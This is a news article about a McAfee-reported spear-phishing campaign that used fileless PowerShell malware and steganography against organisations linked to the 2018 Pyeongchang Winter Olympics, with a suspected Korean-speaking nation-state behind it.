The 2018 Olympic Winter Games will be held in Pyeongchang in February 2018 but malware attacks against the event have already begun.
According to McAfee researchers, hackers are trying to target the upcoming Winter Olympics due to be held in Pyeongchang, South Korea. As per the findings from McAfee, cybercriminals are hunting for sensitive data from different groups that are all linked with the Olympics.
In its report, the company revealed that they identified infected emails being sent to organizations having some involvement with the games. Who is responsible for sending out these emails is yet to be identified. McAfee has warned about more attacks on organizations connected to the 2018 games.
The report stated that the malicious emails were primarily targeted towards ‘firstname.lastname@example.org’ whereas other organizations in South Korea on the BCC line were amongst the key targets including Ski suppliers and ice hockey teams. Most of the organizations were in some way linked to the upcoming games as some were connected through the provision of infrastructure while some were serving as support groups. The emails contained a malicious document that immediately created a hidden back channel in the computers when enabled.
According to a senior analyst at McAfee Ryan Sherstobitoff, the attackers seem to be ‘casting a wide net with this campaign’ because they have included generic email addresses like the ones that begin with info@.
He further noted that: “Theoretically, if they get into the network hosting the Pyeongchang email network for the Olympics, they have any number of possibilities moving inside. It depends on where the networks are connected — to specific teams, committees, planners at a high level.”
The campaign, stated McAfee, ran from 22nd Dec and bears all the signs of involvement of a nation-state adversary that also speaks the Korean language. Since the investigation is currently underway, therefore, the company did not provide any specific name of the probable perpetrator of the attacks.
This time around, attackers have used a much more sophisticated method than the regular spear phishing attack because the recipient of the email does not need to download any file to the malicious software gets installed without getting noticed by a security program. This fileless malware uses Microsoft Powershell to be launched, which has now become a very common tactic among cyber-attackers.
The IP address from which these malicious emails are being sent is based in Singapore and the email requests the recipient to open a Korean text file, which looks legitimate since it seems like an email from the National Counter-Terrorism Centre in South Korea. Through steganography, attackers have managed to hide the malware within images and text.
The timing of this campaign is rather crucial since North Korea has agreed to participate in high-level talks with South Korea. The first round of the détente will be starting soon and the focus of first meet-up would be on the potential participation of North Korea in 2018 Winter Olympics.